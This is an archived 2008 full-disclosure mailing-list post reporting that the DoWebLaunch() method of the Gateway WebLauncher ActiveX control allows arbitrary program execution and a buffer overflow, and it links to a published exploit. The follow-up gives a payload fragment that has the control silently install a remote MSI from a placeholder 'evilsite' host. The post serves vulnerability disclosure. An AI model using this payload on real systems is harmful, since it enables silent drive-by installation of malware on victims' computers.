Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Elazar Broad (elazarhushmail.com)
Date: Wed Jan 09 2008 - 10:17:02 CST
I was playing with this a bit more. Everybody has the Windows
Installer installed, right? How about this:
"","/i http://www.evilsite.com/evilapp.msi /quiet");
On Tue, 08 Jan 2008 20:08:53 -0500 elazarhushmail.com wrote:
>The DoWebLaunch() method of the Gateway WebLauncher ActiveX
>allows for the execution or arbitrary application on a system,
>additionally this method is vulnerable to a buffer overflow in the
>2nd and 4th parameters. Both weblaunch.ocx and weblaunch2.ocx
>the execution of arbitrary files, weblaunch.ocx is vulnerable to
>the above mentioned buffer overflow, I have not checked
>weblaunch2.ocx. Exploit: http://www.milw0rm.com/exploits/4869
>Full-Disclosure - We believe in it.
Click for free information and quotes for interest only loans.
>Hosted and sponsored by Secunia - http://secunia.com/
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/